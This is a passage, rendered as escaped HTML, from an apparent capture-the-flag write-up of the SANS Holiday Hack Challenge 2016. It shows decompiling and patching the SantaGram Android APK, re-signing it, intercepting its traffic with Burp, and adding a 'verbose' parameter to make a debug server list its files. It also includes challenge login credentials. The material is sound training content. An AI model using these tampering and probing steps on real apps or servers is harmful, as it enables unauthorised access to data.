        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Secure&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;getContentResolver&lt;/span&gt;&lt;span class="o"&gt;(),&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;android_id&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;debug&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;getClass&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;getCanonicalName&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;, &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;getClass&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;getSimpleName&lt;/span&gt;&lt;span class="o"&gt;());&lt;/span&gt;
        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;freemem&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getRuntime&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;totalMemory&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;Runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getRuntime&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;freeMemory&lt;/span&gt;&lt;span class="o"&gt;());&lt;/span&gt;
        &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;Thread&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;Runnable&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
            &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="cm"&gt;/* synthetic */&lt;/span&gt; &lt;span class="n"&gt;EditProfile&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;

            &lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;                &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;a&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;b&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;debug_data_collection_url&lt;/span&gt;&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
&lt;/span&gt;            &lt;span class="o"&gt;}&lt;/span&gt;
        &lt;span class="o"&gt;}).&lt;/span&gt;&lt;span class="na"&gt;start&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Exception&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;Log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;e&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;TAG&lt;/span&gt;&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;Error posting JSON debug data: &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getMessage&lt;/span&gt;&lt;span class="o"&gt;());&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, to do so, debug mode must be enabled in the application. To check
this, the application compares the string &lt;code&gt;debug_data_enabled&lt;/code&gt; in the
application resource's to &lt;code&gt;true&lt;/code&gt;. Let's take a look at the resources:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;&amp;lt;!-- File res/values/strings.xml --&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;string&lt;/span&gt; &lt;span class="na"&gt;name=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;debug_data_enabled&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;false&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Debug data are disabled. So we need to modify the resource file of the
application in order to enable it. Luckily, this is something we often have
to do in my day job: more and more of our clients are implementing &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Certificate_pinning"&gt;TLS
certificate pinning&lt;/a&gt;
in their mobile applications, which prevents us from intercepting the tested
application's communication with Burp.  This means that we have to decompile
the application, patch the certificate pinning code, recompile, then reinstall
the application. This is kind of what we have to do here, except instead of
patching the certificate pinning code, we just have to modify the resource file
to enable debug data.&lt;/p&gt;
&lt;p&gt;I'm basically going to use &lt;a class="reference external" href="http://blog.dewhurstsecurity.com/2015/11/10/mobile-security-certificate-pining.html"&gt;this excellent tutorial&lt;/a&gt;
to patch the application and rebuild it without any problem.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt; First, we&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;re disassembling the application
&lt;span class="gp"&gt;$&lt;/span&gt; apktool d ./SantaGram_4.2.apk -o SantaGram_4.2_disassembled
&lt;span class="go"&gt;I: Using Apktool 2.2.1 on SantaGram_4.2.apk&lt;/span&gt;
&lt;span class="go"&gt;I: Loading resource table...&lt;/span&gt;
&lt;span class="go"&gt;I: Decoding AndroidManifest.xml with resources...&lt;/span&gt;
&lt;span class="go"&gt;I: Loading resource table from file: ~/.local/share/apktool/framework/1.apk&lt;/span&gt;
&lt;span class="go"&gt;I: Regular manifest package...&lt;/span&gt;
&lt;span class="go"&gt;I: Decoding file-resources...&lt;/span&gt;
&lt;span class="go"&gt;I: Decoding values */* XMLs...&lt;/span&gt;
&lt;span class="go"&gt;I: Baksmaling classes.dex...&lt;/span&gt;
&lt;span class="go"&gt;I: Copying assets and libs...&lt;/span&gt;
&lt;span class="go"&gt;I: Copying unknown files...&lt;/span&gt;
&lt;span class="go"&gt;I: Copying original files...&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; Now, we modify our resource file
&lt;span class="gp"&gt;$&lt;/span&gt; sed -i &lt;span class="s1"&gt;&amp;#39;s/&amp;lt;string name=&amp;quot;debug_data_enabled&amp;quot;&amp;gt;false/&amp;lt;string name=&amp;quot;debug_data_enabled&amp;quot;&amp;gt;true/g&amp;#39;&lt;/span&gt; SantaGram_4.2_disassembled/res/values/strings.xml
&lt;span class="gp"&gt;$&lt;/span&gt; grep &lt;span class="s1"&gt;&amp;#39;debug_data_enabled&amp;#39;&lt;/span&gt; SantaGram_4.2_disassembled/res/values/strings.xml
&lt;span class="go"&gt;    &amp;lt;string name=&amp;quot;debug_data_enabled&amp;quot;&amp;gt;true&amp;lt;/string&amp;gt;&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; Now, we&lt;span class="err"&gt;&amp;#39;&lt;/span&gt;re rebuilding our application
&lt;span class="gp"&gt;$&lt;/span&gt; apktool b ./SantaGram_4.2_disassembled -o SantaGram_4.2_debug.apk
&lt;span class="go"&gt;I: Using Apktool 2.2.1&lt;/span&gt;
&lt;span class="go"&gt;I: Checking whether sources has changed...&lt;/span&gt;
&lt;span class="go"&gt;I: Smaling smali folder into classes.dex...&lt;/span&gt;
&lt;span class="go"&gt;I: Checking whether resources has changed...&lt;/span&gt;
&lt;span class="go"&gt;I: Building resources...&lt;/span&gt;
&lt;span class="go"&gt;I: Building apk file...&lt;/span&gt;
&lt;span class="go"&gt;I: Copying unknown files/dir...&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; In order to be able to install our new APK, we must sign it, check the above
&lt;span class="gp"&gt;#&lt;/span&gt; tutorial &lt;span class="k"&gt;for&lt;/span&gt; instructions
&lt;span class="gp"&gt;$&lt;/span&gt; keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize &lt;span class="m"&gt;2048&lt;/span&gt; -validity &lt;span class="m"&gt;10000&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore SantaGram_4.2_debug.apk alias_name
&lt;span class="go"&gt;Enter Passphrase for keystore:&lt;/span&gt;
&lt;span class="go"&gt;jar signed.&lt;/span&gt;

&lt;span class="go"&gt;Warning:&lt;/span&gt;
&lt;span class="go"&gt;No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate&amp;#39;s expiration date (2044-05-14) or after any future revocation date.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have a &lt;code&gt;SantaGram_4.2_debug.apk&lt;/code&gt; file, that we can install on our
phone. This application has debugging enabled, which means that we'll see
communication with the debug server.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&amp;lt;reminder&amp;gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Even though communications with the debug server is done in plain
text, the application communicates with the
&lt;a class="reference external" href="https://www.northpolewonderland.com/"&gt;https://www.northpolewonderland.com/&lt;/a&gt; application. Since it's TLS-encrypted, and
the application checks the validity of the certificate, you must import your
intercepting proxy's CA certificate in your telephone. Just a reminder that
Android phones can only import PEM, and that by default Burp exports its CA
certificate in DER. You can use the following OpenSSL command to convert it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; openssl x509 -inform der -in ./burpca.der -out burpca.pem
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;&amp;lt;/reminder&amp;gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We can now launch the application, log in with our credentials
&lt;code&gt;guest/busyreindeer78&lt;/code&gt;, and edit our profile:&lt;/p&gt;
&lt;img alt="dev_edit_profile.png" class="align-center" src="/images/sans-christmas-challenge-2016/dev_edit_profile.png" /&gt;
&lt;p&gt;Our patch worked, because we can see some request to the debug server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/index.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;dev.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;144&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227010602+0100&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;debug&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;com.northpolewonderland.santagram.EditProfile, EditProfile&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freemem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;26914200&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.6.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Tue, 27 Dec 2016 00:06:03 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;250&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227000603&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;status&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;OK&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;filename&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161227000603-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227010602+0100&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;debug&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;com.northpolewonderland.santagram.EditProfile, EditProfile&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freemem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;26914200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;verbose&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see in the server's reponse that there's a &lt;code&gt;verbose&lt;/code&gt; parameter
set to &lt;code&gt;false&lt;/code&gt;. What if we set &lt;code&gt;&amp;quot;verbose&amp;quot;:true&lt;/code&gt; in our request
(me loves some verbosity)?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/index.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;dev.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;159&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227001619+0100&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;debug&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;com.northpolewonderland.santagram.EditProfile, EditProfile&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freemem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;48663448&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;verbose&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.6.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Tue, 27 Dec 2016 00:09:10 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;755&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227000910&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date.len&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;14&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;status&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;OK&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;status.len&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;filename&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161227000910-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;filename.len&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;26&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;20161227001619+0100&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;debug&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;com.northpolewonderland.santagram.EditProfile, EditProfile&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freemem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;48663448&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;verbose&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;files&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:[&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161224235959-0.mp3&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226231736-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226232005-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226232057-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226232243-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226232507-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226232516-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226233655-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226234235-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226234246-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226234259-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161226234313-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161227000501-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161227000603-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;debug-20161227000910-0.txt&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;index.php&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;]}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yes! Many more informations were sent back, including the name of our audio
file, &lt;code&gt;debug-20161224235959-0.mp3&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can now download our audio file at this URL: &lt;a class="reference external" href="http://dev.northpolewonderland.com/debug-20161224235959-0.mp3"&gt;http://dev.northpolewonderland.com/debug-20161224235959-0.mp3&lt;/a&gt;&lt;/p&gt;
&lt;img alt="dev_audio_file.png" class="align-center" src="/images/sans-christmas-challenge-2016/dev_audio_file.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="the-banner-ad-server"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://ads.northpolewonderland.com/"&gt;The Banner Ad Server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The SantaGram bug bounty program is apparently running an ad server, so as to
display ad in the Android application. If we go to this ad web server, we can
see that it's running the &lt;a class="reference external" href="https://www.meteor.com/"&gt;Meteor Javascript framework&lt;/a&gt;:&lt;/p&gt;
